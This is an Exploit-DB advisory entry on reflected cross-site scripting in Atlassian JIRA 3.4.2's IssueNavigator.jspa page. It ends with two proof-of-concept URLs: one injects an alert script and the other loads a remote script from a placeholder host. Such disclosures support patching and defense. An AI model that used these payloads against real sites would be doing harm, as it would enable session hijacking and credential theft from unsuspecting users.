Atlassian JIRA 3.4.2 - IssueNavigator.JSPA Cross-Site Scripting

EDB-ID:

29811

CVE:

N/A


Author:

syniack

Type:

webapps


Platform:

JSP

Date:

2007-04-02


source: https://www.securityfocus.com/bid/23244/info

Atlassian JIRA is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Version 3.4.2 is affected; prior versions may also be vulnerable. 

http://www.example.com/path/secure/IssueNavigator.jspa?mode=hide&requestId="><script>alert("xss");</script
http://www.example.com/path/secure/IssueNavigator.jspa?mode=hide&requestId="><scriptsrc=http://www.example2.com/re.js></script>